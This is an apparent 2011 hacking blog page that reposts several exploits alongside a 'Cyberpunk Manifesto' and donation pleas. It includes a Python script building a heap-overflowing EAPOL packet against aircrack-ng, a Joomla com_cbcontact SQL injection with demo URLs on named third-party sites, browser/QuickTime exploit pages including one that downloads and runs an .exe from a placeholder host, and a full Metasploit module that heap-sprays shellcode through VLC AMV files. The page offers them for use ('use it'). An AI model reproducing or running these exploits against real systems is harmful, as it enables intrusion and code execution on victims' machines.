Post Your Wish

Tuesday, May 17, 2011

Aircrack-NG Tools svn r1675 Remote Exploit

HELP US! IF U WANT! SEND US DONATION ON : VILL+P.O- BIKI HAKOLA, DIST-HOWRAH, STATE- WEST BENGAL, INDIA & PIN CODE(ZIP CODE): 711322 OR SEND VIA WESTERNUNION BY PHONING ME ON : +919903865380. PLZ!!!

Aircrack-NG Tools svn r1675 Remote Exploit
#!/usr/bin/env python # -*- coding: UTF-8 -*- ''' A remote-exploit against the aircrack-ng tools. Tested up to svn r1675. The tools' code responsible for parsing IEEE802.11-packets assumes the self-proclaimed length of a EAPOL-packet to be correct and never to exceed a (arbitrary) maximum size of 256 bytes for packets that are part of the EAPOL-authentication. We can exploit this by letting the code parse packets which: a) proclaim to be larger than they really are, possibly causing the code to read from invalid memory locations while copying the packet; b) really do exceed the maximum size allowed and overflow data structures allocated on the heap, overwriting libc's allocation-related structures. This causes heap-corruption. Both problems lead either to a SIGSEGV or a SIGABRT, depending on the code- path. Careful layout of the packet's content can even possibly alter the instruction-flow through the already well known heap-corruption paths in libc. Playing with the proclaimed length of the EAPOL-packet and the size and content of the packet's padding immediately end up in various assertion errors during calls to free(). This reveals the possibility to gain control over $EIP. Given that we have plenty of room for payload and that the tools are usually executed with root-privileges, we should be able to have a single-packet-own-everything exploit at our hands. As the attacker can cause the various tools to do memory-allocations at his will (through faking the appearance of previously unknown clients), the resulting exploit-code should have a high probability of success. The demonstration-code below requires Scapy >= 2.x and Pyrit >= 0.3.1-dev r238 to work. It generates pcap-file with single packet of the following content: 0801000000DEADC0DE0000DEADC0DE010000000000000000AAAA03000000888E0103FDE8FE0 108000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000043616E20492068617320736F6D65206D6F6172 3F ''' import cpyrit.pckttools import scapy.layers # A IEEE802.11-packet with LLC- and SNAP-header, looking like the second # phase of a EAPOL-handshake (the confirmation). The size set in the EAPOL- # packet will cause an overflow of the "eapol"-field in struct WPA_ST_info and # struct WPA_hdsk. # We have plenty of room for exploit-payload as most of the fields in the # EAPOL_Key-packet are not interpreted. As far as I can see, the adjacent # heap structure will be overwritten by the value of EAPOL_WPAKey.Nonce in # case of airodump-ng... pckt = scapy.layers.dot11.Dot11(addr1='00:de:ad:c0:de:00', \ addr2='00:de:ad:c0:de:01', \ FCfield='to-DS') \ / scapy.layers.dot11.LLC() \ / scapy.layers.dot11.SNAP() \ / scapy.layers.l2.EAPOL(len=65000) \ / cpyrit.pckttools.EAPOL_Key() \ / cpyrit.pckttools.EAPOL_WPAKey(KeyInfo = 'pairwise+mic') \ / scapy.packet.Padding(load='Can I has some moar?') if __name__ == '__main__': print "Packet's content:" print ''.join("%02X" % ord(c) for c in str(pckt)) filename = 'aircrackng_exploit.cap' print "Writing to '%s'" % filename writer = cpyrit.pckttools.Dot11PacketWriter(filename) writer.write(pckt) writer.close() print 'Done'

Monday, May 16, 2011

A Cyberpunk Manifesto v2.0 2003 year [English]

==============================================
A Cyberpunk Manifesto v2.0 2003 year [English]
==============================================
HELP US! IF U WANT! SEND US DONATION ON : VILL+P.O- BIKI HAKOLA, DIST-HOWRAH, STATE- WEST BENGAL, INDIA & PIN CODE(ZIP CODE): 711322 OR SEND VIA WESTERNUNION BY PHONING ME ON : +919903865380. PLZ!!!
//English

We are those with analog/digitalised soul. Cyberpunks. This is to be A second manifestation.


> Cyberpunk.

We are the neo men. Those new species of homosapiens, that were meant to be born at this age.

The way we feel the world, includes the cyberspace as natural. Our first breath take in this world, at the moment of our birth, consisted the dense of electricity flow in wires, the machinery buzz surrounding the place, the data vibrations on information high-ways on air and cable. The way we take technology equals the way others take food, water and air. The data-space it self is the extra element of our enviorment. But we are that mutation, which is not only ordinary presense of technological tools.

Everybody can learn and become to understand technology and new technology, but we are those, who have got it naturaly. We are those that see reality in a different way. Our point of view shows more than ordinary people can see. They see only what is outside, but we see what is inside. That's what we are - realists with the glasses of dreamers. The way we think and look out to the enviorment, the blood that rushes trough our veins, the air that fizzles in our brains - it is that mutation that distinguish us from others.

Being a net-head, a technological-geek, computer nerd is not it, that's a sign. We are new; every and each area of the new being is something we take as homely and familiar. We know history and we know it is dead crawling for life. A Cyberpunk is just a label word, the content inside is us - the man and women who are different, most of us are out of understanding. You can call us crazy, mad, insane, strange, wierdos - that is the most close word in your dictionary to cover what you think of something never manifested before.

Most of today's world is meeting a serious change. Some are sticking with the ruins, some are moving ahead letting go of the past. Society, which still does not want to refresh its self, have found the stability of its existance in the old-approved ways of accepting the ordinary and known. But we are none of them. Cyberpunks will always be refreshing. And even those who claim that cyberpunks is dead, will be just the ones that can not see it reborn in the new wave of discoveries. You can't say that evolution has stopped, or can you.

"Cyberpunks", we are that evolving part. The rebel, who fights for its own survival. And we believe in our strength, because our advantage is that of understanding new fenomenas, which are unclear to the rest, but part of our being.


> Society.

The society prefers to follow a leader. That leader is the one who controls it. People who take decisions on the basis of what they have been told what is right and wrong, are those who follow and trust blindly. Society should learn and find out by the trail of try and fail. Society is a mass, being controlled remotely and or localy by the system and its authorities. The society however, is settled down, prefers to listen and obey.

Society is a mainframe picture of masses who wish to have someone to follow and not live on their own choice. Therefore the society is controlled by the corporations and the governments in a sequence of systems and schematics of chaos control under the big bro's trigger.

Society have created what it needed to have - the bow before leadership of government and corporative kind. Society than was filled up with hatred toward the dangers for the System's integrity.

In times people did need someone to foloow, that someone found it out to be easy to gain profit out of the controlled society and that someone begun to control with dirty tricks, getting away with it, because being the only authority, the controlling System was unvincible. Soceity now remains under control and somelike enjoys it.

Society denies us, because we are far more dagerous to their utopia, then the governments are.

We do not belong to those society masses.


> The System

The System. Centuries-old, existing on principles that hang no more today. A System that has not changed much since the day of its birth. The system is what controls you.

That is the goverment, consisted of people who live separately from the social masses. Governments have not changed since the birth of social living in humen beings. On the other hand the control is with corporations and there is a question who actualy has the control. Is it the corporations who control the governments or they are both the same bureau. However the system is what needs food and support to exist, that support is given by the masses of society, which are like hypnotised when coming to trust someone to have control over the personal life of each member of them.

That support comes by, when the system shoots lies to the social mass. Lies are the truths they want us to believe in. The System must impose its truth upon us so that it can rule. The government needs us follow it blindly. Not only the governemtns, but the corporations, they dictate fashion styles, food choice and medicational prices. They both, Governments and Corporations are what the System is.

A set of rules, filled in by the media. Only a blind and deaf, would grant control over his life to a someone whos greed for money and power is covered by impression of Care, Support, Security and Stability. The system is afraid of chaos, but chaos is just the way they call the possibility of free choice. Where decentralised - people would be able to do better trough.


> The media.

Television, radio and press is no longer the only source of information for the seeking man or for the sleeping one. The Internet is the new mediaspace, a space where information can be spread freely and therefore no one is living in informational eclipse now. Even where governments and bussineses are trying to set restrictions and control over data flow - there are ways to gather that information, which can 'englight'.

And Information still remains power. We are whitnessing the actual growth of our race. No longer informational barriers block the real potential sight and now people can demand more rights. Scientists are making discoveries, which when made public can no longer be so easily blocked for comercial or govermental use. Sad is when people stomped down are willingless to demand what is granted to them. Now the media can awaken people, transform societies. The media however have proven to be false or missleading, which confuses in truth filtering, that just rises Information's price.


> Where are we?

We are those whose DNA is starting to form a new sight and sense - that which will allow the future generations to comprehend with cyberspace, the data-space. No heavy or implanted hardware devices will be able to fully replace what the nature is giving us.

Mutations are taking place. The evolution granted us with a better set of tools to interact with the enviormental changes. That is why we are cyberpunks, neo humen, electronic minds. We know that the Cyberspace is a mirror world, an enhancement, which hosts all past and present creations of man.

The cyberspace is that invisible world where, humen mind and thought merge with matery and takes form visible to the senses, trough machines. The cyberspace seems like it always have existed there, here, everywhere - but only now we are making connections and discovering it - we are begining to change.

Cyberpunks - we are those who live in cyberspace and using the curent technology is only the vessel to bring us on the other side.


We are the altered new race. Cyberpunks.
This is to be A second manifestation.


Joomla Component (com_cbcontact) SQL Injection Vulnerabilities

###
# Title : Joomla Component (com_cbcontact) SQL Injection Vulnerabilities
# Author : Tringle2011
# E-mail : andrew.nile@gmail.com
# platform : php
# Impact : Multiple SQL Injection Vulnerabilities
# Tested on : Windows XP sp3 & Linux.(Ubuntu 10.10) En
###

###

# (+) Exploit & PoC :

/index.php?option=com_cbcontact&task=vcard&contact_id=-11[SQLi]
/index.php?option=com_cbcontact&task=view&contact_id=-11[SQLi]

# (!) Demo :

http://www.thic.dk/ntu/index2.php?option=com_cbcontact&task=vcard&contact_id=-11
http://www.cfc-indonesia.org/index.php?option=com_cbcontact&task=view&contact_id=-11

# (^_^) ! Good Luck ALL ...

Thursday, May 12, 2011

(Firefox & Safari & IE) + QuickTime res://mshtml.dll/ Remote Exploits


<!--
###
# Title : (Firefox & Safari & IE) + QuickTime res://mshtml.dll/ Remote Exploits
# platform : Windows
# Impact : Remote { Buffer Overflow + Download/Exec File (Tr0j4n3) }
# Tested on :Windows XP SP3 (Firefox 4.0 + Safari 4.0.5 & IE7) << QuickTime v7.5.5
###
# (~) Greetings To : all my hacker friends
###
-->

#=======[ PoC (1) Buffer Overflow & Crash !]============>

<html><head>
<script src="res://mshtml.dll/objectembed.js"></script> 
<script language="javascript">
function boom()
 {
 var longunistring1 = unescape("%u4141%u4141");
 var longunistring2 = unescape("%u4242%u4242");
 var longunistring3 = unescape("%u4343%u4343");
 var longunistring4 = unescape("%u4444%u4444");
 for(i=0; i <= 999 ; ++i) 
 {
  longunistring1+=longunistring1;
  longunistring2+=longunistring2;
  longunistring3+=longunistring3;
  longunistring4+=longunistring4;
  document.write(longunistring1);
  document.write(longunistring2);
  document.write(longunistring3);
  document.write(longunistring4);
 }     
 document.write(longunistring1);
 document.write(longunistring2);
 document.write(longunistring3);
 document.write(longunistring4);
 document.write(document.body.innerHTML);
}
var objectSource = boom();
</script>
</head>
<body onload="ObjectLoad();" leftmargin="0" topmargin="0" scroll="no">
<form id="objectDestination"></form></body>
</html>

#=======[ PoC (2) Download/Exec File]============>

<html><head>
<script src="res://mshtml.dll/objectembed.js"></script> 
<script language="javascript">
var objectSource = "http://[HOST]/{file}.exe.gif";
</script>
</head>
<body onload="ObjectLoad();" leftmargin="0" topmargin="0" scroll="no">
<form id="objectDestination"></form></body>
</html>

# Save Any HTML Code and Use him ( Boom !! :D )
This is really great..use it..and comment on it...

Wednesday, May 11, 2011

vlc_amv.rb 12140 2011-03-26 00:07:36Z sinn3r


##
# $Id: vlc_amv.rb 12140 2011-03-26 00:07:36Z sinn3r $
##
 
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
    Rank = NormalRanking
 
    include Msf::Exploit::Remote::HttpServer::HTML
 
    def initialize(info={})
        super(update_info(info,
            'Name'        => "VLC AMV Dangling Pointer Vulnerability",
            'Description' => %q{
                This module exploits VLC media player when handling a .AMV file. By flipping the 0x41st
                byte in the file format (video width/height), VLC crashes due to an invalid pointer, which
                allows remote attackers to gain arbitrary code execution.
                 
                The vulnerable packages include:
                VLC 1.1.4
                VLC 1.1.5
                VLC 1.1.6
                VLC 1.1.7
                },
            'License'     => MSF_LICENSE,
            'Version'     => "$Revision: 12140 $",
            'Author'      =>
                [
                    'sinn3r',
                ],
            'References' =>
                [
                    ['CVE', 'CVE-2010-3275'],
                    ['URL', 'http://www.coresecurity.com/content/vlc-vulnerabilities-amv-nsv-files'],
                ],
            'Payload' =>
                {
                    'BadChars'        => "\x00",
                    'space'           => 1000,
                    'StackAdjustment' => -3500,
                },
            'DefaultOptions' =>
                {
                    'ExitFunction' => "process",
                    'InitialAutoRunScript' => 'migrate -f',
                },
            'Platform' => 'win',
            'Targets'  =>
                [
                    [ 'Automatic', {} ],
                    [ 'Windows XP SP3 IE6', {'Ret'=>0x0c0c0c0c} ],
                    [ 'Windows XP SP3 IE7', {'Ret'=>0x1c1c1c1c} ],
                ],
            'DisclosureDate' => "Mar 23 2011",
            'DefaultTarget' => 0))
 
    end
 
    def getRet(cli, request)
        if target.name == 'Automatic'
 
            agent = request.headers['User-Agent']
 
            case agent
            when /MSIE 6\.0/
                return [0x0c0c0c0c].pack('V') * 8
            when /MSIE 7\.0/
                return [0x1c1c1c1c].pack('V') * 8
            when /^vlc/
                #VLC identifies itself as "VLC" when requesting our trigger file
                return ""
            when /^NSPlayer/
                #NSPlayer is also used while requesting the trigger file
                return ""
            else
                return nil
            end
 
        else
 
            #User manually specified a target
            return [target.ret].pack('V') * 8
 
        end
    end
 
    def exploit
        path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2010-3275.amv")
        f = File.open(path, "rb")
        @trigger = f.read
        f.close
 
        super
    end
 
    def on_request_uri(cli, request)
 
        #Determine if client is a potential victim either manually or automatically,
        #and then return the appropriate EIP
        nops = getRet(cli, request)
        if nops == nil
            send_not_found(cli)
            return
        end
 
        if request.uri.match(/\.amv/)
            print_status("Sending trigger file to #{cli.peerhost}:#{cli.peerport}")
            send_response(cli, @trigger, { 'Content-Type' => 'text/plain' } )
            return
        end
 
        nopsled   = Rex::Text.to_unescape(nops, Rex::Arch.endian(target.arch))
        shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
 
        js_func_name             = rand_text_alpha(rand(6) + 3)
        js_var_blocks_name       = rand_text_alpha(rand(6) + 3)
        js_var_shell_name        = rand_text_alpha(rand(6) + 3)
        js_var_nopsled_name      = rand_text_alpha(rand(6) + 3)
        js_var_index_name        = rand_text_alpha(rand(6) + 3)
        trigger_file             = datastore['URIPATH'] + "/" + rand_text_alpha(rand(6) + 3) + ".amv"
 
        html = <<-EOS
        <html>
        <head>
        <script>
        function #{js_func_name}() {
            var #{js_var_blocks_name} = new Array();
            var #{js_var_shell_name} = unescape("#{shellcode}");
            var #{js_var_nopsled_name} = unescape("#{nopsled}");
            do { #{js_var_nopsled_name} += #{js_var_nopsled_name} } while (#{js_var_nopsled_name}.length < 82000);
            for (#{js_var_index_name}=0; #{js_var_index_name} < 3500; #{js_var_index_name}++) {
                #{js_var_blocks_name}[#{js_var_index_name}] = #{js_var_nopsled_name} + #{js_var_shell_name};
            }
        }
        #{js_func_name}();
        </script>
        </head>
        <body>
        <object classid="clsid:9BE31822-FDAD-461B-AD51-BE1D1C159921"
                codebase="http://downloads.videolan.org/pub/videolan/vlc/latest/win32/axvlc.cab"
                width="0" height="0"
                events="True">
        <param name="Src" value="#{trigger_file}"></param>
        <param name="ShowDisplay" value="False" ></param>
        <param name="AutoLoop" value="no"></param>
        <param name="AutoPlay" value="yes"></param>
        </object>
        </body>
        </html>
        EOS
 
        #Remove extra tabs in HTML
        html = html.gsub(/^\t\t/, "")
 
        print_status("Sending malicious page to #{cli.peerhost}:#{cli.peerport}...")
        send_response( cli, html, {'Content-Type' => 'text/html'} )
    end
end